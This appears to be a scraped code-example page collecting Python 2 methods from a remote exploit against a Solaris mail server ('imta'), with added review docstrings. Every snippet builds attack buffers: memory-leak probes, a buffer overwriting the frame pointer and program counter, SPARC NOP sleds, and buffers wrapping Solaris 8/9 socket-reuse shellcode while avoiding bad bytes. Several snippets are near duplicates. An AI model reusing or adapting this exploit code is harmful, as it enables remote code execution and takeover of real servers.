示例#1
 def validReply(self, target, reply, stackBase):
    """Report whether reply equals the value expected for target.

    The expected value is the first 13 characters of the concatenation of
    utils.stringifyAddr(target.got[0]) and
    utils.stringifyAddr(target.imtaBase + entry) for every later entry of
    target.got, followed by CRLF. stackBase is accepted but not used here.
    """
    pieces = [utils.stringifyAddr(target.got[0])]
    for entry in target.got[1:]:
       # Only the first entry is used as-is; the rest are offsets from imtaBase.
       pieces.append(utils.stringifyAddr(target.imtaBase + entry))
    expected = "".join(pieces)[0:13] + "\r\n"
    # Exact match only: a truncated or extended reply is rejected.
    return True if expected == reply else False
示例#2
 def buildBounceBuffer(self):
    """Return the base buffer extended with three addresses and filler.

    Layout of the result, in order: self.buildBaseBuffer(imtaBase), the
    stringified l7 value, filler from utils.buildBuffer(0x18, badBytes),
    the stringified fp value, and the stringified value of self.pc - 8.

    Reads self.imtaBase, self.l7Imta, self.l7Offset, self.fp, self.badBytes
    and self.pc; self.pc must already be set by the caller.
    May raise IndexError via buildBaseBuffer.
    """
    imtaBase = self.imtaBase
    baseBuf = self.buildBaseBuffer(imtaBase)
    # Both values below are fixed per-target offsets applied to imtaBase.
    l7 = (imtaBase + self.l7Imta) + self.l7Offset
    fp = imtaBase + self.fp
    # presumably 0x18 bytes that avoid self.badBytes -- confirm in utils
    filler = utils.buildBuffer(0x18, self.badBytes)
    bounceBuf = baseBuf \
                + utils.stringifyAddr(l7) \
                + filler \
                + utils.stringifyAddr(fp) \
                + utils.stringifyAddr(self.pc - 8)
    return bounceBuf
示例#3
   def buildImtaLeakBuffers(self, imtaBase):
      """Return a (leakBuf, matchBuf) pair built for the given imtaBase.

      leakBuf is the base buffer followed by the stringified l7 value and
      four filler bytes' worth of utils.buildBuffer output. matchBuf is the
      stringified (imtaBase + self.l7ImtaResponse), the stringified value 0,
      and the literal "01234\\r\\n".

      NOTE(review): matchBuf is presumably the reply the caller compares
      against -- confirm at the call site. May raise IndexError via
      buildBaseBuffer.
      """
      baseBuf = self.buildBaseBuffer(imtaBase)
      l7 = (imtaBase + self.l7Imta) + self.l7Offset
      filler = utils.buildBuffer(4, self.badBytes)
      # Original author's note: the filler is necessary in case 0x20 ends up
      # as the last byte of l7.
      leakBuf = baseBuf \
                + utils.stringifyAddr(l7) \
                + filler
      response = imtaBase + self.l7ImtaResponse
      matchBuf = utils.stringifyAddr(response) \
                 + utils.stringifyAddr(0) \
                 + "01234\r\n"
      return leakBuf, matchBuf
示例#4
 def buildBaseBuffer(self, imtaBase):
    """Return filler with one chosen address spliced in at fixed offsets.

    Scans self.addrs starting at index self.conn for the first entry whose
    imtaBase-relative value passes utils.intHasBadBytes, and stores the
    advanced index back on self.conn, so the scan position persists across
    calls and each call resumes after the last entry examined.

    Raises:
        IndexError: no remaining entry of self.addrs is free of bad bytes.
    """
    filler = utils.buildBuffer(self.baseBufLen, self.badBytes)
    conn = self.conn
    found = False
    while ((not found) and (conn < len(self.addrs))):
       addr = imtaBase + self.addrs[conn]
       # Advance before testing, so self.conn ends up one past the entry used.
       conn += 1
       if (not utils.intHasBadBytes(addr, self.badBytes)):
          found = True
    # The index is written back even when the scan fails.
    self.conn = conn
    if (not found):
       raise IndexError()
    # The slice boundaries skip 4 filler bytes for every address inserted
    # (0x104, 0x120-0x12c, 0x134-0x140, 0x17c), so the overall length is
    # unchanged if stringifyAddr yields 4 bytes -- TODO confirm in utils.
    baseBuf = filler[0x0:0x104] \
              + utils.stringifyAddr(addr) \
              + filler[0x108:0x120] \
              + utils.stringifyAddr(addr) \
              + utils.stringifyAddr(addr) \
              + utils.stringifyAddr(addr) \
              + filler[0x12c:0x134] \
              + utils.stringifyAddr(addr) \
              + utils.stringifyAddr(addr) \
              + utils.stringifyAddr(addr) \
              + filler[0x140:0x17c] \
              + utils.stringifyAddr(addr) \
              + filler[0x180:]
    return baseBuf
示例#5
 def buildShellcodeBuffer(self, target, challenge):
    """Return filler followed by the output of solaris9shellcode.build().

    Side effects: sets the module-level attributes
    solaris9shellcode.socket_offset and solaris9shellcode.challenge before
    calling build(), and stores the chosen pc on target.pc.

    pc starts at target.stackBase + target.bigBufOffset and is advanced in
    steps of 4 until (pc - 8) passes utils.intHasBadBytes; the filler length
    is the distance pc moved from its starting value.
    """
    stackBase = target.stackBase
    basePC = stackBase + target.bigBufOffset
    pc = basePC
    # No upper bound on this loop: it ends only when pc - 8 has no bad bytes.
    while (utils.intHasBadBytes(pc - 8, target.badBytes)):
       pc += 4
    socketLoc = stackBase + target.socketOffset
    # These assignments mutate shared module state, so the values persist
    # for any later build() call until they are overwritten.
    solaris9shellcode.socket_offset = \
       utils.stringifyAddr(socketLoc - (pc + 8))
    solaris9shellcode.challenge = \
       utils.stringifyAddr(challenge);
    filler = utils.buildBuffer(pc - basePC, target.badBytes)
    shellcodeBuf = filler \
                   + solaris9shellcode.build()
    target.pc = pc
    return shellcodeBuf
示例#6
 def buildStackLeakBuffer(self, target, stackBase):
     """Return the target's base buffer followed by an l7 value and filler.

     The l7 value is (stackBase + self.l7Stack) + target.l7Offset; note that
     l7Stack is read from self while the other fields come from target.
     May raise IndexError via target.buildBaseBuffer.
     """
     baseBuf = target.buildBaseBuffer(target.imtaBase)
     l7 = (stackBase + self.l7Stack) + target.l7Offset
     filler = utils.buildBuffer(4, target.badBytes)
     # Original author's note: the filler is necessary in case 0x20 ends up
     # as the last byte of l7.
     leakBuf = baseBuf \
               + utils.stringifyAddr(l7) \
               + filler
     return leakBuf
示例#7
   def buildStackLeakBuffer(self, target, stackBase):
      """Return the target's base buffer followed by an l7 value and filler.

      The l7 value is (stackBase + self.l7Stack) + target.l7Offset; note
      that l7Stack is read from self while the other fields come from
      target. May raise IndexError via target.buildBaseBuffer.
      """
      baseBuf = target.buildBaseBuffer(target.imtaBase)
      l7 = (stackBase + self.l7Stack) + target.l7Offset
      filler = utils.buildBuffer(4, target.badBytes)
      # Original author's note: the filler is necessary in case 0x20 ends up
      # as the last byte of l7.
      leakBuf = baseBuf \
                + utils.stringifyAddr(l7) \
                + filler
      return leakBuf
示例#8
 def buildShellcodeBuffer(self, target):
     """Return a sled of 4-byte words followed by solaris8shellcode.build().

     Side effects: sets the module-level attributes
     solaris8shellcode.stackbase and solaris8shellcode.socket_offset before
     calling build(), and stores the chosen pc on target.pc.

     pc starts at target.stackBase + target.bigBufOffset and is advanced in
     steps of 4 until (pc - 8) passes utils.intHasBadBytes. The sled holds
     (target.bigBufLen - len(shellcode)) / 4 words from
     utils.randomSparcNOP.

     NOTE(review): written for Python 2 -- it relies on range() returning a
     list and on "/" being integer division.
     """
     stackBase = target.stackBase
     basePC = stackBase + target.bigBufOffset
     pc = basePC
     # No upper bound on this loop: it ends only when pc - 8 has no bad bytes.
     while (utils.intHasBadBytes(pc - 8, target.badBytes)):
         pc += 4
     # These assignments mutate shared module state, so the values persist
     # for any later build() call until they are overwritten.
     solaris8shellcode.stackbase = \
        utils.stringifyAddr(stackBase + self.l7Stack)
     solaris8shellcode.socket_offset = \
        utils.stringifyAddr(target.socketOffset)
     badRegs = range(0, 8) + [14, 30, 31]  # global regs, sp, fp, and i7
     shellcode = solaris8shellcode.build()
     sledLen = (target.bigBufLen - len(shellcode)) / 4
     sled = ''
     # Each word is drawn separately, so the sled content can differ between
     # runs (presumably randomised by randomSparcNOP -- confirm in utils).
     for i in range(0, sledLen):
         nop = utils.randomSparcNOP(badRegs, target.badBytes)
         sled += utils.stringifyAddr(nop)
     shellcodeBuf = sled \
                    + shellcode
     target.pc = pc
     return shellcodeBuf
示例#9
 def buildShellcodeBuffer(self, target):
    """Return a sled of 4-byte words followed by solaris8shellcode.build().

    Side effects: sets the module-level attributes
    solaris8shellcode.stackbase and solaris8shellcode.socket_offset before
    calling build(), and stores the chosen pc on target.pc.

    pc starts at target.stackBase + target.bigBufOffset and is advanced in
    steps of 4 until (pc - 8) passes utils.intHasBadBytes. The sled holds
    (target.bigBufLen - len(shellcode)) / 4 words from
    utils.randomSparcNOP.

    NOTE(review): written for Python 2 -- it relies on range() returning a
    list and on "/" being integer division.
    """
    stackBase = target.stackBase
    basePC = stackBase + target.bigBufOffset
    pc = basePC
    # No upper bound on this loop: it ends only when pc - 8 has no bad bytes.
    while (utils.intHasBadBytes(pc - 8, target.badBytes)):
       pc += 4
    # These assignments mutate shared module state, so the values persist
    # for any later build() call until they are overwritten.
    solaris8shellcode.stackbase = \
       utils.stringifyAddr(stackBase + self.l7Stack)
    solaris8shellcode.socket_offset = \
       utils.stringifyAddr(target.socketOffset)
    # Original author's note: global regs, sp, fp, and i7.
    badRegs = range(0, 8) + [14, 30, 31]
    shellcode = solaris8shellcode.build()
    sledLen = (target.bigBufLen - len(shellcode)) / 4
    sled = ''
    # Each word is drawn separately, so the sled content can differ between
    # runs (presumably randomised by randomSparcNOP -- confirm in utils).
    for i in range(0, sledLen):
       nop = utils.randomSparcNOP(badRegs, target.badBytes)
       sled += utils.stringifyAddr(nop)
    shellcodeBuf = sled \
                   + shellcode
    target.pc = pc
    return shellcodeBuf